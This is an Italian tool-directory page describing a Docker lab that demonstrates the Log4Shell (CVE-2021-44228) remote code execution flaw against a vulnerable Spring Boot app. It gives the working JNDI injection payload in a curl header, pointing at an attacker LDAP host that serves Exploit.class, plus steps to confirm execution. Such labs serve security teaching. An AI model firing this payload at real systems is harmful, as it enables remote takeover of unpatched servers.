Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228_Log4Shell — Demo di exploit RCE basata su Docker per Log4Shell (CVE-2021-44228) con app Spring Boot vulnerabile, server LDAP dannoso e consegna del payload tramite iniezione JNDI. | Kitploit
Strumenti/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Demo di exploit RCE basata su Docker per Log4Shell (CVE-2021-44228) con app Spring Boot vulnerabile, server LDAP dannoso e consegna del payload tramite iniezione JNDI.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
24 mesi faNon ancora revisionato
Condividi

Demo di sfruttamento della vulnerabilità Log4Shell (CVE-2021-44228)

Questo progetto simula uno scenario di attacco RCE attraverso la vulnerabilità Log4Shell nella libreria Apache Log4j 2.

Componenti

  1. vulnerable-app: Applicazione Spring Boot che utilizza Log4j 2.14.1.
  2. attacker: Contiene un server LDAP dannoso (marshalsec) e un server HTTP che serve il file del codice malevolo Exploit.class.

Procedura

1. Avvio dell'ambiente

Richiede Docker e Docker Compose installati.

root@kitploit:~
docker compose up --build

Attendere che entrambi i container siano pronti. vulnerable-app sarà in esecuzione sulla porta 8080.

2. Esecuzione dell'attacco

Aprire un nuovo terminale e inviare una richiesta contenente il payload JNDI tramite l'header X-Api-Version:

root@kitploit:~
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. Verifica dei risultati

  • Controllare i log del container vulnerable-app. Vedrai il messaggio del payload registrato.
  • Controllare i log del container attacker. Vedrai la connessione LDAP reindirizzata al server HTTP.
  • Verifica RCE: Controlla se il file /tmp/pwned è stato creato all'interno del container vulnerable-app:
root@kitploit:~
docker exec -it vulnerable-app ls -la /tmp/pwned

Se il file esiste, significa che il codice malevolo Exploit.class è stato eseguito con successo!

Avvertenza

Questo progetto è destinato esclusivamente a fini didattici e di ricerca sulla sicurezza. Non utilizzarlo assolutamente per scopi illegali.

Scarica lo strumento